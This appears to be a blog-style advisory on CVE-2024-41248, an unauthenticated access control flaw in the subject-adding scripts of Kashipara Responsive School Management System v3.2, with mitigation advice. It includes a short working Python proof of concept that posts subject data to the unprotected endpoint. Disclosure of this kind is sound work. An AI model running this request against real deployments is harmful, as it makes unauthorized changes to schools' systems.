CVE-2024-41248 - Incorrect Access Control vulnerability in Kashipara Responsive School Management System v3.2.

A recent security vulnerability has been discovered in the *Kashipara Responsive School Management System (KR-SMS) v3.2.*. The vulnerability exists due to incorrect access control in two PHP scripts, /smsa/add_subject.php and /smsa/add_subject_submit.php. Exploiting this vulnerability, an unauthenticated remote attacker can add new subject entries to the system without proper privileges.

This post will provide more details on the vulnerability, including a code snippet demonstrating the exploit, links to original references, and in-depth analysis of the issue.

Vulnerability Details

CVE ID: CVE-2024-41248
Affected software: Kashipara Responsive School Management System v3.2.
Vulnerability Type: Incorrect Access Control (CWE-285)
Risk Level: High
Attack Vector: Network

Description

The vulnerability allows any unauthenticated user to add new subject entries to the system. The affected files, /smsa/add_subject.php and /smsa/add_subject_submit.php, do not perform any access control checks, permitting malicious users to exploit this vulnerability.

Here is a code snippet that demonstrates how an attacker can exploit this vulnerability

import requests

# Replace the URL with the target server's URL.
target_url = "http://example.com/smsa/add_subject_submit.php";

# Replace with desired subject data.
subject_data = {
    "subcode": "TEST100",
    "subname": "Test Subject",
    "cat": "Theory"
}

response = requests.post(target_url, data=subject_data)

if response.status_code == 200:
    print("[+] Subject added successfully!")
else:
    print("[-] Failed to add subject.")

The attacker can simply use the above script to send a POST request with the desired subject data to the /smsa/add_subject_submit.php script of the target server. The server will then process the request and add the new subject without verifying the user's privileges or authentication.

Original References

1. CVE-2024-41248 - National Vulnerability Database (NVD)
2. Kashipara Responsive School Management System v3.2.

Mitigation and Recommendations

The developer of *Kashipara Responsive School Management System* should address this vulnerability by implementing proper access control checks in the affected scripts. They should ensure that only authenticated users with the necessary privileges can perform actions such as adding a new subject.

For administrators using KR-SMS, it is recommended to monitor the system for any suspicious activity and ensure strong authentication measures are in place. Additionally, applying the existent patches or upgrading to a more recent version of the software can help mitigate the risk posed by this vulnerability.

Keep in mind to always protect your servers and web applications, using good security practices such as keeping software up to date, using strong authentication mechanisms and continuously monitoring for potential threats.

Timeline

Published on: 08/07/2024 16:15:45 UTC
Last modified on: 08/08/2024 15:07:27 UTC